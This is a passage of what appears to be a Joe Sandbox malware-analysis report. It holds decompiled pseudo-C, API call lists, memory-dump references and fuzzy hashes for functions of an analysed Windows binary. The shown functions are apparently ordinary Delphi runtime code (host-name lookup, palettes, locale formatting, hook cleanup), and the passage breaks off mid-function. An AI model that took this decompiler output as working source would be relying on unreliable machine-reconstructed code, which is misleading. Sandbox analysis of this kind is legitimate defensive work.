                                                    				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
                                                    				E00404BB8( &_v412, _t38);
                                                    				_t30 = gethostname(_t38, E00404C80(_v412));
                                                    				_push(_t38);
                                                    				L00472BC0();
                                                    				if(_t30 != 0) {
                                                    					_t55 =  *((intOrPtr*)(_t30 + 0xc));
                                                    					_t39 = 0;
                                                    					while(1) {
                                                    						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
                                                    						if(_t53 == 0) {
                                                    							break;
                                                    						}
                                                    						L00472BB8();
                                                    						E00404BB8( &_v416, _t30);
                                                    						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
                                                    						_t39 = _t39 + 1;
                                                    						__eflags = _t39;
                                                    					}
                                                    					L00472BD8();
                                                    				}
                                                    				_pop(_t48);
                                                    				 *[fs:eax] = _t48;
                                                    				_push(0x472d38);
                                                    				return E004049E4( &_v416, 2);
                                                    			}

                                                    0x00472c66
                                                    0x00472c6c
                                                    0x00472c7d
                                                    0x00472c8a
                                                    0x00472c98
                                                    0x00472ca9
                                                    0x00472cb1
                                                    0x00472cbc
                                                    0x00472cce
                                                    0x00472cd3
                                                    0x00472cd4
                                                    0x00472cdb
                                                    0x00472cdd
                                                    0x00472ce0
                                                    0x00472d07
                                                    0x00472d07
                                                    0x00472d0c
                                                    0x00000000
                                                    0x00000000
                                                    0x00472ce6
                                                    0x00472cf3
                                                    0x00472d03
                                                    0x00472d06
                                                    0x00472d06
                                                    0x00472d06
                                                    0x00472d0e
                                                    0x00472d0e
                                                    0x00472d15
                                                    0x00472d18
                                                    0x00472d1b
                                                    0x00472d30

                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                    • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                    • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                    • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                    • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 348263315-0
                                                    • Opcode ID: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                    • Opcode Fuzzy Hash: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 78%
                                                    			E0042A288(struct HPALETTE__* __eax) {
                                                    				struct HPALETTE__* _t21;
                                                    				char _t28;
                                                    				signed int _t30;
                                                    				struct HPALETTE__* _t36;
                                                    				struct HPALETTE__* _t37;
                                                    				struct HDC__* _t38;
                                                    				intOrPtr _t39;
                                                    
                                                    				_t21 = __eax;
                                                    				_t36 = __eax;
                                                    				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                                    				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                                    					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                                    					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                                    						E00428BFC(_t22);
                                                    					}
                                                    					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                                    					_t37 = _t21;
                                                    					 *(_t39 + 0x10) = _t37;
                                                    					if(_t37 == 0) {
                                                    						_push(0);
                                                    						L00407638();
                                                    						_t21 = E00426060(_t21);
                                                    						_t38 = _t21;
                                                    						if( *((char*)(_t39 + 0x71)) != 0) {
                                                    							L9:
                                                    							_t28 = 1;
                                                    						} else {
                                                    							_push(0xc);
                                                    							_push(_t38);
                                                    							L00407380();
                                                    							_push(0xe);
                                                    							_push(_t38);
                                                    							L00407380();
                                                    							_t30 = _t21 * _t21;
                                                    							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                                    							if(_t30 < _t21) {
                                                    								goto L9;
                                                    							} else {
                                                    								_t28 = 0;
                                                    							}
                                                    						}
                                                    						 *((char*)(_t39 + 0x71)) = _t28;
                                                    						if(_t28 != 0) {
                                                    							_t21 = CreateHalftonePalette(_t38);
                                                    							 *(_t39 + 0x10) = _t21;
                                                    						}
                                                    						_push(_t38);
                                                    						_push(0);
                                                    						L00407888();
                                                    						if( *(_t39 + 0x10) == 0) {
                                                    							 *((char*)(_t36 + 0x30)) = 1;
                                                    							return _t21;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}

                                                    APIs
                                                    • 733AAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                    • 733AAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                    • 733AAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                    • 733AB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380CreateHalftonePalette
                                                    • String ID:
                                                    • API String ID: 178651289-0
                                                    • Opcode ID: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                    • Opcode Fuzzy Hash: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 40%
                                                    			E004266B8(intOrPtr __eax) {
                                                    				char _v5;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _t14;
                                                    				intOrPtr _t16;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t30;
                                                    				void* _t32;
                                                    				void* _t34;
                                                    				intOrPtr _t35;
                                                    
                                                    				_t32 = _t34;
                                                    				_t35 = _t34 + 0xfffffff8;
                                                    				_v5 = 0;
                                                    				if( *0x49e894 == 0) {
                                                    					return _v5;
                                                    				} else {
                                                    					_push(0);
                                                    					L00407638();
                                                    					_v12 = __eax;
                                                    					_push(_t32);
                                                    					_push(0x42673e);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t35;
                                                    					_push(0x68);
                                                    					_t14 = _v12;
                                                    					_push(_t14);
                                                    					L00407380();
                                                    					if(_t14 >= 0x10) {
                                                    						_push(__eax + 4);
                                                    						_push(8);
                                                    						_push(0);
                                                    						_t18 =  *0x49e894; // 0x770805ad
                                                    						_push(_t18);
                                                    						L004073A8();
                                                    						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                                    						_push(8);
                                                    						_push(8);
                                                    						_t21 =  *0x49e894; // 0x770805ad
                                                    						_push(_t21);
                                                    						L004073A8();
                                                    						_v5 = 1;
                                                    					}
                                                    					_pop(_t30);
                                                    					 *[fs:eax] = _t30;
                                                    					_push(0x426745);
                                                    					_t16 = _v12;
                                                    					_push(_t16);
                                                    					_push(0);
                                                    					L00407888();
                                                    					return _t16;
                                                    				}
                                                    			}

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 004266D0
                                                    • 733AAD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                    • 733AAEA0.GDI32(770805AD,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                    • 733AAEA0.GDI32(770805AD,00000008,00000008,?,770805AD,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                    • 733AB380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380
                                                    • String ID:
                                                    • API String ID: 120756276-0
                                                    • Opcode ID: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                    • Opcode Fuzzy Hash: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E0040CBEC(void* __esi, void* __eflags) {
                                                    				char _v8;
                                                    				intOrPtr* _t18;
                                                    				intOrPtr _t26;
                                                    				void* _t27;
                                                    				long _t29;
                                                    				intOrPtr _t32;
                                                    				void* _t33;
                                                    
                                                    				_t33 = __eflags;
                                                    				_push(0);
                                                    				_push(_t32);
                                                    				_push(0x40cc83);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t32;
                                                    				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
                                                    				_t29 = E00409664(0x40cc98, 1, _t33);
                                                    				if(_t29 + 0xfffffffd - 3 < 0) {
                                                    					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
                                                    					_t27 = 7;
                                                    					_t18 = 0x49e770;
                                                    					do {
                                                    						 *_t18 = 0xffffffff;
                                                    						_t18 = _t18 + 4;
                                                    						_t27 = _t27 - 1;
                                                    					} while (_t27 != 0);
                                                    					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
                                                    				}
                                                    				_pop(_t26);
                                                    				 *[fs:eax] = _t26;
                                                    				_push(E0040CC8A);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                    • String ID:
                                                    • API String ID: 4102113445-0
                                                    • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                    • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458FB8() {
                                                    				void* _t2;
                                                    				void* _t5;
                                                    				void* _t8;
                                                    				struct HHOOK__* _t10;
                                                    
                                                    				if( *0x49ebd0 != 0) {
                                                    					_t10 =  *0x49ebd0; // 0x0
                                                    					UnhookWindowsHookEx(_t10);
                                                    				}
                                                    				 *0x49ebd0 = 0;
                                                    				if( *0x49ebd4 != 0) {
                                                    					_t2 =  *0x49ebcc; // 0x0
                                                    					SetEvent(_t2);
                                                    					if(GetCurrentThreadId() !=  *0x49ebc8) {
                                                    						_t8 =  *0x49ebd4; // 0x0
                                                    						WaitForSingleObject(_t8, 0xffffffff);
                                                    					}
                                                    					_t5 =  *0x49ebd4; // 0x0
                                                    					CloseHandle(_t5);
                                                    					 *0x49ebd4 = 0;
                                                    					return 0;
                                                    				}
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                    • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                    • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                    • String ID:
                                                    • API String ID: 2429646606-0
                                                    • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                    • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				void* _t41;
                                                    				signed int _t45;
                                                    				signed int _t47;
                                                    				signed int _t49;
                                                    				signed int _t51;
                                                    				intOrPtr _t75;
                                                    				void* _t76;
                                                    				signed int _t77;
                                                    				signed int _t83;
                                                    				signed int _t92;
                                                    				intOrPtr _t111;
                                                    				void* _t122;
                                                    				void* _t124;
                                                    				intOrPtr _t127;
                                                    				void* _t128;
                                                    
                                                    				_t128 = __eflags;
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_t122 = __edx;
                                                    				_t124 = __eax;
                                                    				_push(_t127);
                                                    				_push(0x40ce66);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t127;
                                                    				_t92 = 1;
                                                    				E004049C0(__edx);
                                                    				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
                                                    				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                    					while(1) {
                                                    						_t41 = E00404C80(_t124);
                                                    						__eflags = _t92 - _t41;
                                                    						if(_t92 > _t41) {
                                                    							goto L28;
                                                    						}
                                                    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                    						asm("bt [0x49b134], eax");
                                                    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                    							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
                                                    							__eflags = _t45;
                                                    							if(_t45 != 0) {
                                                    								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
                                                    								__eflags = _t47;
                                                    								if(_t47 != 0) {
                                                    									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
                                                    									__eflags = _t49;
                                                    									if(_t49 != 0) {
                                                    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                    										__eflags = _t51;
                                                    										if(_t51 == 0) {
                                                    											L24:
                                                    											E00404C88(_t122, 0x40cec0);
                                                    										} else {
                                                    											__eflags = _t51 != 0x20;
                                                    											if(_t51 != 0x20) {
                                                    												E00404BA8();
                                                    												E00404C88(_t122, _v24);
                                                    											} else {
                                                    												goto L24;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										E00404C88(_t122, 0x40ceb4);
                                                    										_t92 = _t92 + 1;
                                                    									}
                                                    								} else {
                                                    									E00404C88(_t122, 0x40cea0);
                                                    									_t92 = _t92 + 3;
                                                    								}
                                                    							} else {
                                                    								E00404C88(_t122, 0x40ce8c);
                                                    								_t92 = _t92 + 1;
                                                    							}
                                                    							_t92 = _t92 + 1;
                                                    							__eflags = _t92;
                                                    						} else {
                                                    							_v8 = E0040DD78(_t124, _t92);
                                                    							E00404EE0(_t124, _v8, _t92,  &_v20);
                                                    							E00404C88(_t122, _v20);
                                                    							_t92 = _t92 + _v8;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t75 =  *0x49e748; // 0x9
                                                    					_t76 = _t75 - 4;
                                                    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                    						_t77 = 1;
                                                    					} else {
                                                    						_t77 = 0;
                                                    					}
                                                    					if(_t77 == 0) {
                                                    						E00404A14(_t122, _t124);
                                                    					} else {
                                                    						while(_t92 <= E00404C80(_t124)) {
                                                    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                    							__eflags = _t83;
                                                    							if(_t83 != 0) {
                                                    								__eflags = _t83 != 0x20;
                                                    								if(_t83 != 0x20) {
                                                    									E00404BA8();
                                                    									E00404C88(_t122, _v16);
                                                    								}
                                                    							}
                                                    							_t92 = _t92 + 1;
                                                    							__eflags = _t92;
                                                    						}
                                                    					}
                                                    				}
                                                    				L28:
                                                    				_pop(_t111);
                                                    				 *[fs:eax] = _t111;
                                                    				_push(E0040CE6D);
                                                    				return E004049E4( &_v24, 4);
                                                    			}

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: eeee$ggg$yyyy
                                                    • API String ID: 4232894706-1253427255
                                                    • Opcode ID: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                    • Opcode Fuzzy Hash: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				struct tagPOINT _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				char _v36;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t54;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t71;
                                                    				intOrPtr _t74;
                                                    				void* _t88;
                                                    				intOrPtr _t105;
                                                    				intOrPtr _t115;
                                                    				intOrPtr _t116;
                                                    				intOrPtr _t120;
                                                    				intOrPtr _t123;
                                                    				intOrPtr _t124;
                                                    				intOrPtr _t129;
                                                    				void* _t133;
                                                    				intOrPtr _t134;
                                                    				void* _t137;
                                                    
                                                    				_t137 = __fp0;
                                                    				_v8 = __ecx;
                                                    				_t88 = __edx;
                                                    				_t124 = __eax;
                                                    				 *0x49eb34 = __eax;
                                                    				_push(_t133);
                                                    				_push(0x439471);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t134;
                                                    				_v12 = 0;
                                                    				 *0x49eb3c = 0;
                                                    				_t135 =  *((char*)(__eax + 0x9b));
                                                    				if( *((char*)(__eax + 0x9b)) != 0) {
                                                    					E00403DE8(__eax, __eflags);
                                                    					__eflags =  *0x49eb34;
                                                    					if( *0x49eb34 != 0) {
                                                    						__eflags = _v12;
                                                    						if(_v12 == 0) {
                                                    							_v12 = E00438690(1, _t124);
                                                    							 *0x49eb3c = 1;
                                                    						}
                                                    						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                                    						_t105 =  *0x437498; // 0x4374e4
                                                    						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                                    						__eflags = _t54;
                                                    						if(_t54 == 0) {
                                                    							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                                    							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                                    							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                                    								L14:
                                                    								__eflags = 0;
                                                    								E004197DC(0,  &_v36, 0, _t124, _t129);
                                                    								E0043AA94(_t129,  &_v28,  &_v36);
                                                    								_t60 = _v12;
                                                    								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                                    								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                                    								L15:
                                                    								_t130 = _v12;
                                                    								_t125 =  *((intOrPtr*)(_v12 + 0x38));
                                                    								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                                    								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
                                                    								_t65 = _v12;
                                                    								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                                    								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                                    								goto L16;
                                                    							}
                                                    							_t116 =  *0x437498; // 0x4374e4
                                                    							_t71 = E00403D78(_t129, _t116);
                                                    							__eflags = _t71;
                                                    							if(_t71 != 0) {
                                                    								goto L14;
                                                    							}
                                                    							GetCursorPos( &_v20);
                                                    							_t74 = _v12;
                                                    							 *(_t74 + 0x44) = _v20.x;
                                                    							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                                    							goto L15;
                                                    						} else {
                                                    							GetWindowRect(E00441704(_t128), _v12 + 0x44);
                                                    							L16:
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							L17:
                                                    							E0043915C(_v12, _v8, _t88, _t133, _t137);
                                                    							_pop(_t115);
                                                    							 *[fs:eax] = _t115;
                                                    							return 0;
                                                    						}
                                                    					}
                                                    					_pop(_t120);
                                                    					 *[fs:eax] = _t120;
                                                    					return 0;
                                                    				}
                                                    				E00403DE8(__eax, _t135);
                                                    				if( *0x49eb34 != 0) {
                                                    					__eflags = _v12;
                                                    					if(_v12 == 0) {
                                                    						_v12 = E00438578(_t124, 1);
                                                    						 *0x49eb3c = 1;
                                                    					}
                                                    					goto L17;
                                                    				}
                                                    				_pop(_t123);
                                                    				 *[fs:eax] = _t123;
                                                    				return 0;
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \`C$tC
                                                    • API String ID: 0-3452953066
                                                    • Opcode ID: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                    • Opcode Fuzzy Hash: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                                    				intOrPtr _v16;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t28;
                                                    				intOrPtr* _t32;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t37;
                                                    				struct HWND__* _t38;
                                                    				intOrPtr _t39;
                                                    				intOrPtr* _t41;
                                                    				intOrPtr _t45;
                                                    				intOrPtr _t49;
                                                    				intOrPtr* _t53;
                                                    				long _t58;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t60;
                                                    				intOrPtr* _t65;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t70;
                                                    				intOrPtr* _t77;
                                                    				void* _t79;
                                                    				intOrPtr* _t80;
                                                    				long long _t87;
                                                    
                                                    				_t87 = __fp0;
                                                    				_t80 = _t79 + 0xfffffff8;
                                                    				_t70 = __ecx;
                                                    				_t45 = __edx;
                                                    				_t77 = __eax;
                                                    				 *0x49eb38 = __eax;
                                                    				_t24 =  *0x49eb38; // 0x0
                                                    				 *((intOrPtr*)(_t24 + 4)) = 0;
                                                    				GetCursorPos(0x49eb44);
                                                    				_t26 =  *0x49eb38; // 0x0
                                                    				_t58 = 0x49eb44->x; // 0x0
                                                    				 *(_t26 + 0xc) = _t58;
                                                    				_t59 =  *0x49eb48; // 0x0
